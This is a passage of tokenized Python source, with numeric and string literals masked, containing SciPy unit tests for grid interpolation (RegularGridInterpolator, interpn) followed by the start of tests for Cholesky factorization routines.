<EOL> fill_value = None ) <EOL> sample = np . asarray ( [ [ - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT:11> ] , [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> ] ] ) <EOL> wanted = np . asarray ( [ <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> assert_array_almost_equal ( interp ( sample , method = "<STR_LIT>" ) , wanted ) <EOL> wanted = np . asarray ( [ - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> ] ) <EOL> assert_array_almost_equal ( interp ( sample , method = "<STR_LIT>" ) , wanted ) <EOL> def test_out_of_bounds_fill ( self ) : <EOL> points , values = self . _get_sample_4d ( ) <EOL> interp = RegularGridInterpolator ( points , values , bounds_error = False , <EOL> fill_value = np . nan ) <EOL> sample = np . asarray ( [ [ - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> ] ] ) <EOL> wanted = np . asarray ( [ np . nan , np . nan , np . nan ] ) <EOL> assert_array_almost_equal ( interp ( sample , method = "<STR_LIT>" ) , wanted ) <EOL> assert_array_almost_equal ( interp ( sample , method = "<STR_LIT>" ) , wanted ) <EOL> sample = np . asarray ( [ [ <NUM_LIT:0.1> , <NUM_LIT:0.1> , <NUM_LIT:1.> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0.5> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> wanted = np . asarray ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> assert_array_almost_equal ( interp ( sample ) , wanted ) <EOL> def test_nearest_compare_qhull ( self ) : <EOL> points , values = self . _get_sample_4d ( ) <EOL> interp = RegularGridInterpolator ( points , values , method = "<STR_LIT>" ) <EOL> points_qhull = itertools . product ( * points ) <EOL> points_qhull = [ p for p in points_qhull ] <EOL> points_qhull = np . asarray ( points_qhull ) <EOL> values_qhull = values . reshape ( - <NUM_LIT:1> ) <EOL> interp_qhull = NearestNDInterpolator ( points_qhull , values_qhull ) <EOL> sample = np . asarray ( [ [ <NUM_LIT:0.1> , <NUM_LIT:0.1> , <NUM_LIT:1.> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0.5> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> assert_array_almost_equal ( interp ( sample ) , interp_qhull ( sample ) ) <EOL> def test_linear_compare_qhull ( self ) : <EOL> points , values = self . _get_sample_4d ( ) <EOL> interp = RegularGridInterpolator ( points , values ) <EOL> points_qhull = itertools . product ( * points ) <EOL> points_qhull = [ p for p in points_qhull ] <EOL> points_qhull = np . asarray ( points_qhull ) <EOL> values_qhull = values . reshape ( - <NUM_LIT:1> ) <EOL> interp_qhull = LinearNDInterpolator ( points_qhull , values_qhull ) <EOL> sample = np . asarray ( [ [ <NUM_LIT:0.1> , <NUM_LIT:0.1> , <NUM_LIT:1.> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0.5> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> assert_array_almost_equal ( interp ( sample ) , interp_qhull ( sample ) ) <EOL> def test_duck_typed_values ( self ) : <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:5> ) <EOL> y = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:7> ) <EOL> values = MyValue ( ( <NUM_LIT:5> , <NUM_LIT:7> ) ) <EOL> for method in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> interp = RegularGridInterpolator ( ( x , y ) , values , <EOL> method = method ) <EOL> v1 = interp ( [ <NUM_LIT> , <NUM_LIT> ] ) <EOL> interp = RegularGridInterpolator ( ( x , y ) , values . _v , <EOL> method = method ) <EOL> v2 = interp ( [ <NUM_LIT> , <NUM_LIT> ] ) <EOL> assert_allclose ( v1 , v2 ) <EOL> def test_invalid_fill_value ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:5> ) <EOL> y = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:7> ) <EOL> values = np . random . rand ( <NUM_LIT:5> , <NUM_LIT:7> ) <EOL> RegularGridInterpolator ( ( x , y ) , values , fill_value = <NUM_LIT:1> ) <EOL> assert_raises ( ValueError , RegularGridInterpolator , <EOL> ( x , y ) , values , fill_value = <NUM_LIT:1> + <NUM_LIT> ) <EOL> def test_fillvalue_type ( self ) : <EOL> values = np . ones ( ( <NUM_LIT:10> , <NUM_LIT:20> , <NUM_LIT:30> ) , dtype = '<STR_LIT>' ) <EOL> points = [ np . arange ( n ) for n in values . shape ] <EOL> xi = [ ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) ] <EOL> interpolator = RegularGridInterpolator ( points , values ) <EOL> interpolator = RegularGridInterpolator ( points , values , fill_value = <NUM_LIT:0.> ) <EOL> class MyValue ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , shape ) : <EOL> self . ndim = <NUM_LIT:2> <EOL> self . shape = shape <EOL> self . _v = np . arange ( np . prod ( shape ) ) . reshape ( shape ) <EOL> def __getitem__ ( self , idx ) : <EOL> return self . _v [ idx ] <EOL> def __array_interface__ ( self ) : <EOL> return None <EOL> def __array__ ( self ) : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> class TestInterpN ( TestCase ) : <EOL> def _sample_2d_data ( self ) : <EOL> x = np . arange ( <NUM_LIT:1> , <NUM_LIT:6> ) <EOL> x = np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> y = np . arange ( <NUM_LIT:1> , <NUM_LIT:6> ) <EOL> y = np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> z = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> ] ] ) <EOL> return x , y , z <EOL> def test_spline_2d ( self ) : <EOL> x , y , z = self . _sample_2d_data ( ) <EOL> lut = RectBivariateSpline ( x , y , z ) <EOL> xi = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:3> ] ] ) . T <EOL> assert_array_almost_equal ( interpn ( ( x , y ) , z , xi , method = "<STR_LIT>" ) , <EOL> lut . ev ( xi [ : , <NUM_LIT:0> ] , xi [ : , <NUM_LIT:1> ] ) ) <EOL> def test_list_input ( self ) : <EOL> x , y , z = self . _sample_2d_data ( ) <EOL> xi = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:3> ] ] ) . T <EOL> for method in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> v1 = interpn ( ( x , y ) , z , xi , method = method ) <EOL> v2 = interpn ( ( x . tolist ( ) , y . tolist ( ) ) , z . tolist ( ) , <EOL> xi . tolist ( ) , method = method ) <EOL> assert_allclose ( v1 , v2 , err_msg = method ) <EOL> def test_spline_2d_outofbounds ( self ) : <EOL> x = np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> y = np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> z = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> ] ] ) <EOL> lut = RectBivariateSpline ( x , y , z ) <EOL> xi = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:3> ] ] ) . T <EOL> actual = interpn ( ( x , y ) , z , xi , method = "<STR_LIT>" , <EOL> bounds_error = False , fill_value = <NUM_LIT> ) <EOL> expected = lut . ev ( xi [ : , <NUM_LIT:0> ] , xi [ : , <NUM_LIT:1> ] ) <EOL> expected [ <NUM_LIT:2> : <NUM_LIT:4> ] = <NUM_LIT> <EOL> assert_array_almost_equal ( actual , expected ) <EOL> assert_raises ( ValueError , interpn , ( x , y ) , z , xi , method = "<STR_LIT>" , <EOL> bounds_error = False , fill_value = None ) <EOL> def _sample_4d_data ( self ) : <EOL> points = [ ( <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> ) ] * <NUM_LIT:2> + [ ( <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT> ) ] * <NUM_LIT:2> <EOL> values = np . asarray ( [ <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> ] ) <EOL> values0 = values [ : , np . newaxis , np . newaxis , np . newaxis ] <EOL> values1 = values [ np . newaxis , : , np . newaxis , np . newaxis ] <EOL> values2 = values [ np . newaxis , np . newaxis , : , np . newaxis ] <EOL> values3 = values [ np . newaxis , np . newaxis , np . newaxis , : ] <EOL> values = ( values0 + values1 * <NUM_LIT:10> + values2 * <NUM_LIT:100> + values3 * <NUM_LIT:1000> ) <EOL> return points , values <EOL> def test_linear_4d ( self ) : <EOL> points , values = self . _sample_4d_data ( ) <EOL> interp_rg = RegularGridInterpolator ( points , values ) <EOL> sample = np . asarray ( [ [ <NUM_LIT:0.1> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> wanted = interpn ( points , values , sample , method = "<STR_LIT>" ) <EOL> assert_array_almost_equal ( interp_rg ( sample ) , wanted ) <EOL> def test_4d_linear_outofbounds ( self ) : <EOL> points , values = self . _sample_4d_data ( ) <EOL> sample = np . asarray ( [ [ <NUM_LIT:0.1> , - <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> wanted = <NUM_LIT> <EOL> actual = interpn ( points , values , sample , method = "<STR_LIT>" , <EOL> bounds_error = False , fill_value = <NUM_LIT> ) <EOL> assert_array_almost_equal ( actual , wanted ) <EOL> def test_nearest_4d ( self ) : <EOL> points , values = self . _sample_4d_data ( ) <EOL> interp_rg = RegularGridInterpolator ( points , values , method = "<STR_LIT>" ) <EOL> sample = np . asarray ( [ [ <NUM_LIT:0.1> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> wanted = interpn ( points , values , sample , method = "<STR_LIT>" ) <EOL> assert_array_almost_equal ( interp_rg ( sample ) , wanted ) <EOL> def test_4d_nearest_outofbounds ( self ) : <EOL> points , values = self . _sample_4d_data ( ) <EOL> sample = np . asarray ( [ [ <NUM_LIT:0.1> , - <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> wanted = <NUM_LIT> <EOL> actual = interpn ( points , values , sample , method = "<STR_LIT>" , <EOL> bounds_error = False , fill_value = <NUM_LIT> ) <EOL> assert_array_almost_equal ( actual , wanted ) <EOL> def test_xi_1d ( self ) : <EOL> points , values = self . _sample_4d_data ( ) <EOL> sample = np . asarray ( [ <NUM_LIT:0.1> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> v1 = interpn ( points , values , sample , bounds_error = False ) <EOL> v2 = interpn ( points , values , sample [ None , : ] , bounds_error = False ) <EOL> assert_allclose ( v1 , v2 ) <EOL> def test_xi_nd ( self ) : <EOL> points , values = self . _sample_4d_data ( ) <EOL> np . random . seed ( <NUM_LIT> ) <EOL> sample = np . random . rand ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) <EOL> v1 = interpn ( points , values , sample , method = '<STR_LIT>' , <EOL> bounds_error = False ) <EOL> assert_equal ( v1 . shape , ( <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> v2 = interpn ( points , values , sample . reshape ( - <NUM_LIT:1> , <NUM_LIT:4> ) , <EOL> method = '<STR_LIT>' , bounds_error = False ) <EOL> assert_allclose ( v1 , v2 . reshape ( v1 . shape ) ) <EOL> def test_xi_broadcast ( self ) : <EOL> x , y , values = self . _sample_2d_data ( ) <EOL> points = ( x , y ) <EOL> xi = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> yi = np . linspace ( <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:3> ) <EOL> for method in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> sample = ( xi [ : , None ] , yi [ None , : ] ) <EOL> v1 = interpn ( points , values , sample , method = method , <EOL> bounds_error = False ) <EOL> assert_equal ( v1 . shape , ( <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> xx , yy = np . meshgrid ( xi , yi ) <EOL> sample = np . c_ [ xx . T . ravel ( ) , yy . T . ravel ( ) ] <EOL> v2 = interpn ( points , values , sample , <EOL> method = method , bounds_error = False ) <EOL> assert_allclose ( v1 , v2 . reshape ( v1 . shape ) ) <EOL> def test_nonscalar_values ( self ) : <EOL> points , values = self . _sample_4d_data ( ) <EOL> np . random . seed ( <NUM_LIT> ) <EOL> values = np . random . rand ( <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:6> ) <EOL> sample = np . random . rand ( <NUM_LIT:7> , <NUM_LIT:11> , <NUM_LIT:4> ) <EOL> for method in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> v = interpn ( points , values , sample , method = method , <EOL> bounds_error = False ) <EOL> assert_equal ( v . shape , ( <NUM_LIT:7> , <NUM_LIT:11> , <NUM_LIT:6> ) , err_msg = method ) <EOL> vs = [ interpn ( points , values [ ... , j ] , sample , method = method , <EOL> bounds_error = False ) <EOL> for j in range ( <NUM_LIT:6> ) ] <EOL> v2 = np . array ( vs ) . transpose ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> ) <EOL> assert_allclose ( v , v2 , err_msg = method ) <EOL> assert_raises ( ValueError , interpn , points , values , sample , <EOL> method = '<STR_LIT>' ) <EOL> def test_complex ( self ) : <EOL> x , y , values = self . _sample_2d_data ( ) <EOL> points = ( x , y ) <EOL> values = values - <NUM_LIT> * values <EOL> sample = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:3> ] ] ) . T <EOL> for method in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> v1 = interpn ( points , values , sample , method = method ) <EOL> v2r = interpn ( points , values . real , sample , method = method ) <EOL> v2i = interpn ( points , values . imag , sample , method = method ) <EOL> v2 = v2r + <NUM_LIT> * v2i <EOL> assert_allclose ( v1 , v2 ) <EOL> with warnings . catch_warnings ( ) : <EOL> warnings . simplefilter ( "<STR_LIT:error>" , category = np . ComplexWarning ) <EOL> assert_raises ( np . ComplexWarning , interpn , points , values , <EOL> sample , method = '<STR_LIT>' ) <EOL> def test_duck_typed_values ( self ) : <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:5> ) <EOL> y = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:7> ) <EOL> values = MyValue ( ( <NUM_LIT:5> , <NUM_LIT:7> ) ) <EOL> for method in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> v1 = interpn ( ( x , y ) , values , [ <NUM_LIT> , <NUM_LIT> ] , method = method ) <EOL> v2 = interpn ( ( x , y ) , values . _v , [ <NUM_LIT> , <NUM_LIT> ] , method = method ) <EOL> assert_allclose ( v1 , v2 ) <EOL> def test_matrix_input ( self ) : <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:5> ) <EOL> y = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:7> ) <EOL> values = np . matrix ( np . random . rand ( <NUM_LIT:5> , <NUM_LIT:7> ) ) <EOL> sample = np . random . rand ( <NUM_LIT:3> , <NUM_LIT:7> , <NUM_LIT:2> ) <EOL> for method in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> v1 = interpn ( ( x , y ) , values , sample , method = method ) <EOL> v2 = interpn ( ( x , y ) , np . asarray ( values ) , sample , method = method ) <EOL> assert_allclose ( v1 , np . asmatrix ( v2 ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> run_module_suite ( ) </s>
<s> from __future__ import division , print_function , absolute_import <EOL> from numpy . testing import TestCase , assert_array_almost_equal <EOL> from numpy import array , transpose , dot , conjugate , zeros_like <EOL> from numpy . random import random <EOL> from scipy . linalg import cholesky , cholesky_banded , cho_solve_banded , cho_factor , cho_solve <EOL> from scipy . linalg . _testutils import assert_no_overwrite <EOL> class TestCholesky ( TestCase ) : <EOL> def test_simple ( self ) : <EOL> a = [ [ <NUM_LIT:8> , <NUM_LIT:2> , <NUM_LIT:3> ] , [ <NUM_LIT:2> , <NUM_LIT:9> , <NUM_LIT:3> ] , [ <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:6> ] ] <EOL> c = cholesky ( a ) <EOL> assert_array_almost_equal ( dot ( transpose ( c ) , c ) , a ) <EOL> c = transpose ( c ) <EOL> a = dot ( c , transpose ( c ) ) <EOL> assert_array_almost_equal ( cholesky ( a , lower = <NUM_LIT:1> ) , c ) <EOL> def test_check_finite ( self ) : <EOL> a = [ [ <NUM_LIT:8> , <NUM_LIT:2> , <NUM_LIT:3> ] , [ <NUM_LIT:2> , <NUM_LIT:9> , <NUM_LIT:3> ] , [ <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:6> ] ] <EOL> c = cholesky ( a , check_finite = False ) <EOL> assert_array_almost_equal ( dot ( transpose ( c ) , c ) , a ) <EOL> c = transpose ( c ) <EOL> a = dot ( c , transpose ( c ) ) <EOL> assert_array_almost_equal ( cholesky ( a , lower = <NUM_LIT:1> , check_finite = False ) , c ) <EOL> def test_simple_complex ( self ) : <EOL> m = array ( [ [ <NUM_LIT:3> + <NUM_LIT> , <NUM_LIT:3> + <NUM_LIT> , <NUM_LIT:5> ] , [ <NUM_LIT:0> , <NUM_LIT:2> + <NUM_LIT> , <NUM_LIT:2> + <NUM_LIT> ] , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:7> + <NUM_LIT> ] ] ) <EOL> a = dot ( transpose ( conjugate ( m ) ) , m ) <EOL> c = cholesky ( a ) <EOL> a1 = dot ( transpose ( conjugate ( c ) ) , c ) <EOL> assert_array_almost_equal ( a , a1 ) <EOL> c = transpose ( c ) <EOL> a = dot ( c , transpose ( conjugate ( c ) ) ) <EOL> assert_array_almost_equal ( cholesky ( a , lower = <NUM_LIT:1> ) , c ) <EOL> def test_random ( self ) : <EOL> n = <NUM_LIT:20> <EOL> for k in range ( <NUM_LIT:2> ) : <EOL> m = random ( [ n , n ] ) <EOL> for i in range ( n ) : <EOL> m [ i , i ] = <NUM_LIT:20> * ( <NUM_LIT> + m [ i , i ] ) <EOL> a = dot ( transpose ( m ) , m ) <EOL> c = cholesky ( a ) <EOL> a1 = dot ( transpose ( c ) , c ) <EOL> assert_array_almost_equal ( a , a1 ) <EOL> c = transpose ( c ) <EOL> a = dot ( c , transpose ( c ) ) <EOL> assert_array_almost_equal ( cholesky ( a , lower = <NUM_LIT:1> ) , c ) <EOL> def test_random_complex ( self ) : <EOL> n = <NUM_LIT:20> <EOL> for k in range ( <NUM_LIT:2> ) : <EOL> m = random ( [ n , n ] ) + <NUM_LIT> * random ( [ n , n ] ) <EOL> for i in range ( n ) : <EOL> m [ i , i ] = <NUM_LIT:20> * ( <NUM_LIT> + abs ( m [ i , i ] ) ) <EOL> a = dot ( transpose ( conjugate ( m ) ) , m ) <EOL> c = cholesky ( a ) <EOL> a1 = dot ( transpose ( conjugate ( c ) ) , c ) <EOL> assert_array_almost_equal ( a , a1 ) <EOL> c = transpose ( c ) <EOL> a = dot ( c , transpose ( conjugate ( c ) ) ) <EOL> assert_array_almost_equal ( cholesky ( a , lower = <NUM_LIT:1> ) , c ) <EOL> class TestCholeskyBanded ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_check_finite ( self ) : <EOL> a = array ( [ [ <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ] , <EOL> [ <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT:0.0> ] , <EOL> [ <NUM_LIT:0.0> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> ab = array ( [ [ - <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:0.5> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> c = cholesky_banded ( ab , lower = False , check_finite = False ) <EOL> ufac = zeros_like ( a ) <EOL> ufac [ list ( range ( <NUM_LIT:4> ) ) , list ( range ( <NUM_LIT:4> ) ) ] = c [ - <NUM_LIT:1> ] <EOL> ufac [ ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ) , ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) ] = c [ <NUM_LIT:0> , <NUM_LIT:1> : ] <EOL> assert_array_almost_equal ( a , dot ( ufac . T , ufac ) ) <EOL> b = array ( [ <NUM_LIT:0.0> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> x = cho_solve_banded ( ( c , False ) , b , check_finite = False ) <EOL> assert_array_almost_equal ( x , [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ] ) <EOL> def test_upper_real ( self ) : <EOL> a = array ( [ [ <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ] , <EOL> [ <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT:0.0> ] , <EOL> [ <NUM_LIT:0.0> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> ab = array ( [ [ - <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:0.5> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> c = cholesky_banded ( ab , lower = False ) <EOL> ufac = zeros_like ( a ) <EOL> ufac [ list ( range ( <NUM_LIT:4> ) ) , list ( range ( <NUM_LIT:4> ) ) ] = c [ - <NUM_LIT:1> ] <EOL> ufac [ ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ) , ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) ] = c [ <NUM_LIT:0> , <NUM_LIT:1> : ] <EOL> assert_array_almost_equal ( a , dot ( ufac . T , ufac ) ) <EOL> b = array ( [ <NUM_LIT:0.0> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> x = cho_solve_banded ( ( c , False ) , b ) <EOL> assert_array_almost_equal ( x , [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ] ) <EOL> def test_upper_complex ( self ) : <EOL> a = array ( [ [ <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ] , <EOL> [ <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT:0.0> ] , <EOL> [ <NUM_LIT:0.0> , <NUM_LIT:0.5> , <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> ab = array ( [ [ - <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:0.5> , - <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> c = cholesky_banded ( ab , lower = False ) <EOL> ufac = zeros_like ( a ) <EOL> ufac [ list ( range ( <NUM_LIT:4> ) ) , list ( range ( <NUM_LIT:4> ) ) ] = c [ - <NUM_LIT:1> ] <EOL> ufac [ ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ) , ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) ] = c [ <NUM_LIT:0> , <NUM_LIT:1> : ] <EOL> assert_array_almost_equal ( a , dot ( ufac . conj ( ) . T , ufac ) ) <EOL> b = array ( [ <NUM_LIT:0.0> , <NUM_LIT:0.5> , <NUM_LIT> - <NUM_LIT> , <NUM_LIT> + <NUM_LIT> ] ) <EOL> x = cho_solve_banded ( ( c , False ) , b ) <EOL> assert_array_almost_equal ( x , [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ] ) <EOL> def test_lower_real ( self ) : <EOL> a = array ( [ [ <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ] , <EOL> [ <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT:0.0> ] , <EOL> [ <NUM_LIT:0.0> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> ab = array ( [ [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:1.0> , <NUM_LIT:0.5> , <NUM_LIT> , - <NUM_LIT:1.0> ] ] ) <EOL> c = cholesky_banded ( ab , lower = True ) <EOL> lfac = zeros_like ( a ) <EOL> lfac [ list ( range ( <NUM_LIT:4> ) ) , list ( range ( <NUM_LIT:4> ) ) ] = c [ <NUM_LIT:0> ] <EOL> lfac [ ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) , ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ) ] = c [ <NUM_LIT:1> , : <NUM_LIT:3> ] <EOL> assert_array_almost_equal ( a , dot ( lfac , lfac . T ) ) <EOL> b = array ( [ <NUM_LIT:0.0> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> x = cho_solve_banded ( ( c , True ) , b ) <EOL> assert_array_almost_equal ( x , [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ] ) <EOL> def test_lower_complex ( self ) : <EOL> a = array ( [ [ <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ] , <EOL> [ <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT:0.0> ] , <EOL> 